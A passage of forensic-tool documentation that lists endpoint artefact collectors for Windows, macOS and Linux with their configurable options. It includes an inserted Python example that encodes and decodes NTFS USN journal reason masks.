File Operations Multiple selection The file operations to include in this collection. No
USB

Collect information about USB storage devices including connection history, device details, and associated drive letters.

Events generated

UsbDeviceInfo: Information about each USB device attachment.

UserAssist

Collect Windows Explorer user activity data including program execution history, focus time, and user interaction metrics.

Events generated

UserAssistAppLaunchInfo: Information about an application launched via user-assisted GUI menu.

Users

Collects metadata for users, such as name and last login.

Events generated

UserIdentity: UserIdentity provides information about a security principal identified by the UserSid field.

Configurable options
Option Type Description In default configuration?
Allow Domain Controller Boolean Allow the collector to run on a domain controller. No
USN

Collects the Update Sequence Number (USN) journal of the New Technology File System (NTFS).

Events generated

USNRecord: Information about an entry in the USN journal.

Configurable options
Option Type Description In default configuration?
Drive Path String The directory path to scan. Environment and app variables are automatically expanded. No. Collector defaults to %SystemDrive%
Maximum Duration (seconds) Integer Maximum journal analysis duration in seconds. Yes. 60 seconds

Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Maximum Entries Integer Maximum number of entries to collect. Default: unlimited No
Do Not Form Full Path Boolean Do not attempt to form full file path of each record. No
USN Entry Reason Mask Integer 32-bit mask value for filtering USN entries. For example, 256 [0x100] for file creation. No
USN Entry Reason Equality Integer 32-bit equality value for matching USN entries. No
Days to Report Integer Report events generated within the last given number of days. No
USN reason bit mask values

These values can be combined. For example: 0x00000034 or 0x34 can be expressed as 52 to describe USN_REASON_DATA_TRUNCATION, USN_REASON_NAMED_DATA_OVERWRITE and USN_REASON_NAMED_DATA_EXTEND.

Reason Value
USN_REASON_DATA_OVERWRITE 0x00000001
USN_REASON_DATA_EXTEND 0x00000002
USN_REASON_DATA_TRUNCATION 0x00000004
USN_REASON_NAMED_DATA_OVERWRITE 0x00000010
USN_REASON_NAMED_DATA_EXTEND 0x00000020
USN_REASON_NAMED_DATA_TRUNCATION 0x00000040
USN_REASON_FILE_CREATE 0x00000100
USN_REASON_FILE_DELETE 0x00000200
USN_REASON_EA_CHANGE 0x00000400
USN_REASON_SECURITY_CHANGE 0x00000800
USN_REASON_RENAME_OLD_NAME 0x00001000
USN_REASON_RENAME_NEW_NAME 0x00002000
USN_REASON_INDEXABLE_CHANGE 0x00004000
USN_REASON_BASIC_INFO_CHANGE 0x00008000
USN_REASON_HARD_LINK_CHANGE 0x00010000
USN_REASON_COMPRESSION_CHANGE 0x00020000
USN_REASON_ENCRYPTION_CHANGE 0x00040000
USN_REASON_OBJECT_ID_CHANGE 0x00080000
USN_REASON_REPARSE_POINT_CHANGE 0x00100000
USN_REASON_STREAM_CHANGE 0x00200000
USN_REASON_TRANSACTED_CHANGE 0x00400000
USN_REASON_INTEGRITY_CHANGE 0x00800000
USN_REASON_DESIRED_STORAGE_CLASS_CHANGE 0x01000000
USN_REASON_CLOSE 0x80000000
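Added example (not from the Falcon Forensics documentation or CrowdStrike): how the reason values in the table above combine into the 32-bit value the USN Entry Reason Mask option expects, and how a record's reason field decodes back into names. The any-bit filter in reason_matches_mask and the sample records are assumptions constructed for illustration; the page does not specify the collector's exact filter semantics.

```python
# Added example (not Falcon Forensics code): encode/decode the 32-bit USN reason
# mask used by the USN collector's "USN Entry Reason Mask" option.

# Reason bit values exactly as listed in the USN reason bit mask table.
USN_REASONS = {
    "USN_REASON_DATA_OVERWRITE": 0x00000001,
    "USN_REASON_DATA_EXTEND": 0x00000002,
    "USN_REASON_DATA_TRUNCATION": 0x00000004,
    "USN_REASON_NAMED_DATA_OVERWRITE": 0x00000010,
    "USN_REASON_NAMED_DATA_EXTEND": 0x00000020,
    "USN_REASON_NAMED_DATA_TRUNCATION": 0x00000040,
    "USN_REASON_FILE_CREATE": 0x00000100,
    "USN_REASON_FILE_DELETE": 0x00000200,
    "USN_REASON_EA_CHANGE": 0x00000400,
    "USN_REASON_SECURITY_CHANGE": 0x00000800,
    "USN_REASON_RENAME_OLD_NAME": 0x00001000,
    "USN_REASON_RENAME_NEW_NAME": 0x00002000,
    "USN_REASON_INDEXABLE_CHANGE": 0x00004000,
    "USN_REASON_BASIC_INFO_CHANGE": 0x00008000,
    "USN_REASON_HARD_LINK_CHANGE": 0x00010000,
    "USN_REASON_COMPRESSION_CHANGE": 0x00020000,
    "USN_REASON_ENCRYPTION_CHANGE": 0x00040000,
    "USN_REASON_OBJECT_ID_CHANGE": 0x00080000,
    "USN_REASON_REPARSE_POINT_CHANGE": 0x00100000,
    "USN_REASON_STREAM_CHANGE": 0x00200000,
    "USN_REASON_TRANSACTED_CHANGE": 0x00400000,
    "USN_REASON_INTEGRITY_CHANGE": 0x00800000,
    "USN_REASON_DESIRED_STORAGE_CLASS_CHANGE": 0x01000000,
    "USN_REASON_CLOSE": 0x80000000,
}

# Reverse lookup: bit value -> reason name.
_VALUE_TO_NAME = {value: name for name, value in USN_REASONS.items()}


def encode_reason_mask(names):
    """OR the named reasons into one mask (the documented 0x34 == 52 case).

    An unknown name raises KeyError so a typo in a collector configuration
    cannot silently turn into a mask that matches nothing.
    """
    mask = 0
    for name in names:
        mask |= USN_REASONS[name]
    return mask


def decode_reason_mask(value):
    """Expand a mask or a record's reason field into names, lowest bit first.

    Bits set but absent from the table are reported as UNDOCUMENTED_BIT_0x...
    instead of being dropped, so nothing is hidden when reading real journals.
    """
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"reason mask must fit in 32 bits, got {value:#x}")
    names = []
    for bit in range(32):
        flag = 1 << bit
        if value & flag:
            names.append(_VALUE_TO_NAME.get(flag, f"UNDOCUMENTED_BIT_{flag:#010x}"))
    return names


def reason_matches_mask(record_reason, mask):
    """Any-bit match: keep the record if it shares a reason bit with the mask.
    The page does not spell out the collector's filter semantics; this is the
    usual mask interpretation and is an assumption here."""
    return (record_reason & mask) != 0


# Constructed sample records (path, reason). USN_REASON_CLOSE is ORed in, as NTFS
# does on the final journal record for a file handle.
SAMPLE_RECORDS = [
    ("\\Users\\alice\\Downloads\\invoice.pdf", 0x80000100),          # create + close
    ("\\Users\\alice\\Downloads\\invoice.pdf", 0x80000002),          # data extend + close
    ("\\Users\\alice\\AppData\\Local\\Temp\\tmp1.dat", 0x80000200),  # delete + close
    ("\\Users\\alice\\Documents\\report.docx", 0x80002000),          # rename new name + close
]


def filter_records(records, mask):
    """Return (path, reason names) for each record that passes the mask filter."""
    return [(path, decode_reason_mask(reason))
            for path, reason in records if reason_matches_mask(reason, mask)]


if __name__ == "__main__":
    print(52, decode_reason_mask(52))      # the documented 0x34 example
    print(256, decode_reason_mask(256))    # the documented file-creation example
    mask = encode_reason_mask(["USN_REASON_FILE_CREATE", "USN_REASON_FILE_DELETE"])
    print(f"mask {mask:#x} ({mask})")
    for path, names in filter_records(SAMPLE_RECORDS, mask):
        print(path, names)
```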
VSS

Collects metadata from the Volume Shadow Copy Service (VSS). This collector is not in the default configuration.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Path is required for this collector. No
File Operations Multiple selection The file operations to include in this collection. No
Guess VSS Device Object Paths Boolean Guess VSS device object paths if API fails. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
File Mask String Specify which files to include using wildcards. For example, .exe, log.txt. Default: *.* No
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Recursive Listing Boolean Enables recursive directory scanning. No
Only PE Boolean Only report on executable files. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Weblog

Collects entries from IIS and Apache web server logs. This collector is not in the default configuration.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Before Date Date Report events generated on or before this UTC date. No
After Date Date Report events generated on or after this UTC date. No
Process Last Lines Integer Only process the last specified number of lines of each log file. No
Process Top Lines Integer Only process the top specified number of lines of each log file. No
Days to Report Integer Report events generated within the last given number of days. No
Exclude Filter String Regular expression pattern for excluding paths. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
WebShell

Collects metadata related to webshell script files, identified by matching file content against a built-in list of regular expressions.

Events generated

WebShellDetected: To identify WebShell script files in a target folder, the content of each text file is matched against a large built-in list of regular expressions.

Configurable options
Option Type Description In default configuration?
Starting Directory Selection Must select Automatically Determine Web Root Directories or Path. Yes. Automatically determine web root directories
File Operations Multiple selection The file operations to include in this collection. Yes. attributes, cam, fileid, name, owner, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Scan All Drives Boolean Enumerate all fixed drives and substitute each in <path>. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
File Mask String Specify which files to include using wildcards. For example, .exe, log.txt. No. Collector defaults to *.*
Maximum File Size Integer Maximum size considered as webshell file, in bytes. Yes
Minimum File Size Integer Minimum size considered as webshell file, in bytes. Yes. 64

Recursive Listing Boolean Enables recursive directory scanning. Yes
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Collect First Bytes Boolean Collect and report first 'n' bytes of file. Yes. 256

Minimum Rating Percentage Integer Only report on ratings at or above this percentage. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
WMI

Issues a Windows Management Instrumentation (WMI) query and collects the results of the query. There are multiple collectors in the default configuration.

Events generated

WmiQuery: Windows Management Instrumentation (WMI) query status.

Configurable options
Option Type Description In default configuration?
WMI Query String WMI query to execute. No
WMI Namespace String Namespace to query. Default: 'Root\Cimv2' No
Properties String Properties to collect. Default: all No
Output As JSON Boolean Output results in JSON format. Yes
Do Not Output As JSON Boolean Disable JSON output format. No
Default configuration examples

Event subscription queries

WMI Query Namespace
SELECT * FROM __EventConsumer Root\Subscription
SELECT * FROM __EventFilter Root\Subscription
SELECT * FROM __FilterToConsumerBinding Root\Subscription

Security center queries

WMI Query Namespace
SELECT * FROM AntiVirusProduct Root\SecurityCenter2
SELECT * FROM AntiVirusProduct Root\SecurityCenter

Software monitoring queries

WMI Query Namespace Properties
Select * from CCM_RecentlyUsedApps Root\CCM\SoftwareMeteringAgent LastUsedTime, AdditionalProductCodes, CompanyName, ExplorerFileName, FileDescription, FilePropertiesHash, FileSize, FileVersion, FolderPath, LastUserName, LaunchCount, msiDisplayName, msiPublisher, msiVersion, OriginalFileName, ProductCode, ProductLanguage, ProductName, ProductVersion, SoftwarePropertiesHash
WLAN

Collects information about wireless local network (WLAN) interfaces and available networks.

Events generated

WlanInterfaceInfo: Contains information about the wireless LAN interface.

Configurable options
Option Type Description In default configuration?
Ignore Private MAC Addresses Boolean Ignore private MAC addresses in the Basic Service Set Identifier (BSSID) list. Yes
Sort BSSID List Boolean Sort the list of BSSIDs. Yes
YARA

Runs YARA rules against the endpoint and collects the results. This collector is not in the default configuration.

Events generated

FfcBytePatternScanResult: Result of a YARA scan.

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Scan Active Processes Memory Boolean Enable scanning of active process memory. No
Scan Process Executable Files Boolean Enable scanning of process executable files. No
Scan Process Modules Boolean Enable scanning of process modules. No
Process ID Integer Specific process ID to scan. No
Scan Files Boolean Enable file scanning. No
Web Root String Automatically add and target IIS web root directories. No
Yara rules configuration
Option Type Description In default configuration?
YARA Rules Directory String Directory containing YARA rule files. Yes
YARA Rule File Mask String YARA rule file name mask. Yes
YARA Include Filter String YARA rule file path inclusion regex filter pattern. No
YARA Exclude Filter String YARA rule file path exclusion regex filter pattern. No
YARA Recursive Boolean Recurse into YARA rules directory. No
YARA Text Rules String Embed YARA rules directly within the config file. No
Target path configuration
Option Type Description In default configuration?
Target Path String The directory path to scan. Environment and app variables are automatically expanded. No. Collector defaults to current directory.
File Mask String Specify which files to include using wildcards. For example, .exe, log.txt. No. Collector defaults to *.*

Include Filter String Regular expression pattern for including paths. No
Exclude Filter String Regular expression pattern for excluding paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Target Recursive Boolean Recurse into target directories No
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
File operations and limits
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Maximum Target Size String Maximum size of targets to scan. Default is megabytes, but you can use B, KB, MB, or GB. No
Maximum Memory Size String Maximum memory size to scan. Default is megabytes, but you can use B, KB, MB, or GB. No
Scan options
Option Type Description In default configuration?
Fast Mode Boolean Use YARA fast mode matching. No
Show Hits And Misses Boolean Show scan misses along with positive hits. No
Verbose Boolean Enable additional informational output. No
ZIP

Collects directory listing and analysis of ZIP files. This collector is not in the default configuration.

Events generated

ArchiveInfo: Information about an archive file.

ArchiveMemberInfo: Information about a file inside of an archive.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No
File Operations Multiple selection The file operations to include in this collection. No
Zip Content Operations Multiple selection File operations for files inside archive. No
File Mask String Specify which files to include using wildcards. For example, .exe, log.txt. Default: *.zip No
Zip Content Mask String File name mask for files inside archive. No
Scan All Drives Boolean Enumerate all fixed drives and substitute each in <path>. No
Exclude Filter String Regular expression pattern for excluding paths. No
Zip Content Exclude Pattern String Regular expression pattern for excluding paths within ZIP files. No
Include Filter String Regular expression pattern for including paths. No
Zip Content Include Pattern String Regular expression pattern for including paths within ZIP files. No
Maximum Entries Integer Maximum number of entries to collect. Default: unlimited No
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Recursive Listing Boolean Enables recursive directory scanning. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No

Mac collectors

AppleSystemLog

Collects Apple System Log (ASL) events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Yes. /private/var/log/asl/*.asl
Maximum items Integer Maximum number of log entries to collect. Yes. 5000
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. Yes. 30d

AppleUnifiedLog

Collects Apple Unified Log (AUL) events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. /private/var/db/diagnostics
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. No
Maximum items Integer Maximum number of entries to collect. No
Predicates Multiple selection Select common predefined filter expressions. Yes. See Predefined predicates reference.

Custom Predicate String Enter a single predicate expression. For example, 'process == kernel' No
Predefined predicates reference
Predicate Filter expression
sudo process == "sudo" && eventMessage CONTAINS[c] "User=root" && (NOT eventMessage CONTAINS[c] "root : PWD=/ ; USER=root") && (NOT eventMessage CONTAINS[c] " root : PWD=")
logind process == "logind"
tccd process == "tccd"
sshd process == "sshd"
kextd (process == "kextd" && sender == "IOKit")
screensharingd (process == "screensharingd")
security (process == "loginwindow" && sender == "Security")
sessions (process == "securityd" && eventMessage CONTAINS "Session" && subsystem == "com.apple.securityd")
loginwindow (eventMessage contains "com.apple.sessionagent.screenIs") OR (processImagePath contains "loginwindow" and eventMessage contains "com.apple.sessionDidLogin") OR (eventMessage contains "com.apple.system.loginwindow")
Applications

Collects information about installed applications.

Events generated

InstalledApplication: This event contains all the information for a single app.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. Yes. 3 patterns:
/Library/Receipts/InstallHistory.plist
/private/var/db/receipts/*.plist
/Library/Apple/System/Library/Receipts/*.plist
Audit

Collects various system audit events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. /private/var/audit/[0-9]*.[0-9]*
Maximum items Integer Maximum number of entries to collect. Yes. 20000
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. Yes. 100d

Auto Runs

Collects information on programs that are run automatically.

Events generated

AutoRunProcessInfo: Informational event on a process that was executed automatically.

Browser: Chrome

Collect browser history, downloads, and other artifacts from the Chrome web browser.

Events generated

BrowserAccountInfo: Information about a browser’s user accounts.

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserHistoryClearInfo: Browser history clearing event information.

Configurable options
Option Type Description In default configuration?
Record limit Integer Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension. Yes. 1000

Browser: Firefox

Collect browser history, downloads, and other artifacts from the Firefox web browser.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserProxyInfo: Information about a proxy in the browser.

Configurable options
Option Type Description In default configuration?
Record limit Integer Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension. Yes. 1000

Browser: Safari

Collect browser history, downloads, and other artifacts from the Safari web browser.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

Configurable options
Option Type Description In default configuration?
Record limit Integer Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension. Yes. 1000

Entropy

Collects entropy metrics and statistical properties from files across the filesystem. This collector is not in the default configuration.

Events generated

EntropyScan: File contents entropy, useful for identifying potentially malicious files.

Configurable options
Option Type Description In default configuration?
Paths String Specify directory paths to search. Multiple directories may be provided if separated by commas. No
Maximum items Integer Maximum number of items to process. No
Maximum File Size (Bytes) Integer Skip files that are larger than this size. No
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Glob File Patterns String Specify glob file patterns to match. No
Env Vars

Collects information on all system and current user variables.

Events generated

RuntimeEnvironmentVariable: Environment variable provided to a process. In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.

Event Taps

Collects information on macOS Human Interface Device (HID) events.

Events generated

EventTapInfo: Describes a macOS event tap. Event taps enable the capture of keyboard and mouse HID events.

FileSystem

Collects a list of files and sub-directories and provides details about each file. There are multiple filesystem collectors in the default configuration.

Events generated

FileInfo: Information about a file.

FileTimestampMetadata: File time event per timestamp for a given file, used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. 4 locations:
/Users
/private
/usr/local
/Applications
Batch Size Integer The number of files to process in a batch. Yes. 8
Recursion Depth Integer Recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. Yes. 100
Maximum File Size For Hashing (Bytes) Integer Skip hashing for files larger than this size. Yes. 100000000
Maximum items Integer Maximum number of items to process. Yes. 100000

FS Events

Collects macOS file system (FS) records.

Events generated

MacFsEventRecord: Mac FSEvents record, forensically interesting file system logs and information.

IP Addresses

Collects IP4/6 addresses on the machine.

Events generated

LocalIpAddressIP4: Describes an IPv4 Address on the machine.

LocalIpAddressIP6: Describes an IPv6 Address on the machine.

IP Connections

Collects NetworkReceiveAccept, NetworkConnect, NetworkListen, and NetworkClose events for both IPv4 and IPv6.

Events generated

NetworkListenIP4: IPv4 Network listen event.

NetworkReceiveAcceptIP4: IPv4 network SYN event.

NetworkConnectIP4: IPv4 network connect event.

NetworkCloseIP4: IPv4 network close event.

NetworkListenIP6: IPv6 Network listen event.

NetworkReceiveAcceptIP6: IPv6 network SYN event.

NetworkConnectIP6: IPv6 network connect event.

NetworkCloseIP6: IPv6 network close event.

IP Routes

Collects IP4/6 route information.

Events generated

RouteIP4: IPv4 route entry.

RouteIP6: IPv6 Route entry.

Kernel Modules

Collects information on kernel modules that have been loaded into memory.

Events generated

KernelModeLoadImage: Indicates a kernel-mode module has been loaded into memory.

Kernel Params

Collects kernel parameter information.

Events generated

KernelParameter: A value in the operating system kernel.

Knowledge

Collects information from the Mac KnowledgeC database.

Events generated

MacKnowledgeActivityStart: An entry from a KnowledgeC database indicating the start of some user activity on a macOS system.

MacKnowledgeActivityEnd: An entry from a KnowledgeC database indicating the end of some user activity on a macOS system.

Configurable options
Option Type Description In default configuration?
Glob pattern String Glob path to KnowledgeC database. Yes. /Users/*/Library/Application\ Support/*/knowledgeC.db

Line

Collects information contained in various log files and reconstructs logs line by line. There are multiple collectors for Line to cover multiple sources. For more info, see Default configuration examples.

Events generated

FileEntry: Some portion of a text file, either a single line or matched regular expression.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. No
Log file type Multiple selection Specifies the type of log file to process. No
Default configuration examples

SSH configuration files

Name Glob pattern Log file type
ssh-config /Users/*/.ssh/config FILE_SSH_CONFIG
authorized-keys /Users/*/.ssh/authorized_keys FILE_AUTHORIZED_KEYS
authorized-keys-root /root/*/authorized_keys FILE_AUTHORIZED_KEYS
known-hosts /Users/*/*/known_hosts FILE_KNOWN_HOSTS
known-hosts-root /root/*/known_hosts FILE_KNOWN_HOSTS

Shell configuration files

Name Glob pattern Log file type
user-rc /Users/*/*rc FILE_SHELL_CONFIG
user-profile /Users/*/*profile FILE_SHELL_CONFIG
rc /etc/rc FILE_SYSTEM_CONFIG
root-rc /root/rc FILE_SYSTEM_CONFIG
sub-root-rc /root/*/rc FILE_SYSTEM_CONFIG
etc-profile /etc/profile FILE_SYSTEM_CONFIG

System authentication files

Name Glob pattern Log file type
pam.d /etc/pam.d*/* FILE_SYSTEM_AUTH
etc-security /etc/security*/* FILE_SYSTEM_AUTH
log-secure /var/log/secure* FILE_SYSTEM_AUTH
sudoers /etc/sudoers FILE_SYSTEM_AUTH

Scheduled tasks

Name Glob pattern Log file type
at /var/at/**/* FILE_SCHEDULED
MacMRU

Collects Apple SharedFileList (.sfl/.sfl2) files that record most recently used (MRU) items.

Events generated

MacMRU: A digital forensics record derived from Apple SharedFileList (.sfl/.sfl2) files. This event helps identify most recently used resources such as applications, documents, and volumes.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. Yes. Two collectors:
/Users/*/Library/Application\ Support/*/*.sfl*
/private/var/root/Library/Application Support/*/*.sfl*

MacSpotlight

Collects per-user Spotlight search information from 4 different sources.

Events generated

SpotlightSearchEntry: Per-user spotlight search information.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. Yes. 4 sources:

useractivities-users-spotlight: /Users/*/Library/Application Support/com.apple.spotlight/com.apple.spotlight.Shortcuts*

useractivities-private-spotlight: /private/var/*/Library/Application Support/com.apple.spotlight.Shortcuts

useractivities-users: /Users/*/Library/Application Support/com.apple.spotlight.Shortcuts

useractivities-users-preferences-spotlight: /Users/*/Library/Preferences/com.apple.spotlight.Shortcuts

NetUsage

Collects network usage on endpoints and processes.

Events generated

NetworkEndPointDataUsage: This event has total counts of sent and received octets and packets to and from the network-attached end point during active connection. The counting window is the life of the end point.

ProcessDataUsage: Measurements and statistics of data traffic sent and received to and from the target process.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. Yes. Two collectors:
/private/var/networkd/netusage.sqlite
/private/var/networkd/db/netusage.sqlite

Processes

Collects information on currently running processes at time of collection.

Events generated

ProcessRollup2: Running process observed at collection time.

Quarantines

Collects information from files with the quarantine extended attribute.

Events generated

LSQuarantineEvent: A database record indicating that the system quarantined a file.

QuarantineXattribute: A file xattribute value indicating that the system quarantined a file.

Configurable options
Option Type Description In default configuration?
Quarantine Databases String Comma-separated list of paths to quarantine event databases on the local machine. Yes. /Users/*/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2
Scan Location String Location that should be scanned for the QuarantineXattribute. Max depth of 1. Yes. /Users/*/Downloads

System Extensions

Collects information on loaded System Extensions.

Events generated

SystemExtension: Describes a macOS system extension identified by the collector.

SystemLog

Collects information from various log files.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. /var/log/system.log*
Maximum items Integer Maximum number of entries to collect. Yes. 50000
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. Yes. 100d

Terminal Saved State

Collects information on a terminal's saved state.

Events generated

TerminalSavedStateInfo: macOS Terminal saved state information.

Users

Collects information on user and group accounts on a system.

Events generated

UserAccount: Information about an observed user account.

Configurable options
Option Type Description In default configuration?
Sources String Adds additional sources to pull users from (currently: opendirectory). Local users are always collected. No
UTmpLog

Collects information on user terminal login and logout events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. /var/run/utmpx
Maximum items Integer Maximum number of entries to collect. Yes. 10000
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. Yes. 100d

Volumes

Collects information on all mounted disks.

Events generated

FsVolumeMounted: Information about a volume that has been observed.

YARA

Runs YARA rules against the endpoint and collects the results. This collector is not in the default configuration.

Events generated

FfcBytePatternScanResult: Result of a YARA scan.

Configurable options
Option Type Description In default configuration?
Directory paths String Directory path(s) to scan. Can specify multiple paths separated by newlines. No
File paths String Specific file path(s) to scan. Can specify multiple paths separated by newlines. No
YARA text rules String Embed YARA rules directly within the config file No
ZSH Sessions

Collects ZSH session information.

Events generated

FileEntry: Some portion of a text file, either a single line or matched regular expression.

Linux collectors

Applications

Collects information about installed applications.

Events generated

InstalledApplication: This event contains all the information for a single app.

Configurable options
Option Type Description In default configuration?
Glob pattern String Specify a glob pattern to match and limit collected data. Yes. 4 patterns:
/var/lib/dpkg/status
/var/lib/rpm/Packages
/var/lib/rpm/Packages.db
/var/lib/rpm/rpmdb.sqlite

Audit

Collects various system audit events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. /var/log/audit/audit*
Maximum items Integer Maximum number of entries to collect. Yes. 20000
Maximum Age String Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d. Yes. 100d

Browser: Chrome

Collect browser history, downloads, and other artifacts from the Chrome web browser.

Events generated

BrowserAccountInfo: Information about a browser’s user accounts.

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserHistoryClearInfo: Browser history clearing event information.

Configurable options
Option Type Description In default configuration?
Record limit Integer Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension. Yes. Default: 1000

Browser: Firefox

Collect browser history, downloads, and other artifacts from the Firefox web browser.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserProxyInfo: Information about a proxy in the browser.

Configurable options
Option Type Description In default configuration?
Record limit Integer Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension. Yes. Default: 1000

Entropy

Collects entropy metrics and statistical properties from files across the filesystem. This collector is not in the default configuration.

Events generated

EntropyScan: File contents entropy, useful for identifying potentially malicious files.

Configurable options
Option Type Description In default configuration?
Paths String Specify directory paths to search. Multiple directories may be provided if separated by commas. No
Maximum items Integer Maximum number of items to process. No
Maximum File Size (Bytes) Integer Skip files that are larger than this size. No
Recursion Depth Integer Integer denotes recursion depth; for example, 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Glob File Patterns String Specify glob file patterns to match. No
Skip Directory String Specify a directory to exclude from collection. No
Env Vars

Collects information on all system and current user variables.

Events generated

RuntimeEnvironmentVariable: Environment variable provided to a process. In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.

FileSystem

Collects a list of files and sub-directories and provides details about each file. There are multiple filesystem collectors in the default configuration. For more info, see Configurable options.

Events generated

FileInfo: Information about a file.

FileTimestampMetadata: File time event per timestamp for a given file, used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String Specify a directory path. Yes. Default: /
Batch Size Integer The number of files to process in a batch. Yes. Default: 8
Recursion Depth Integer Integer denotes recursion depth; for example, 0 = top level only, 1 = 1 level down, 2 = 2 levels down. Yes. Default: 100
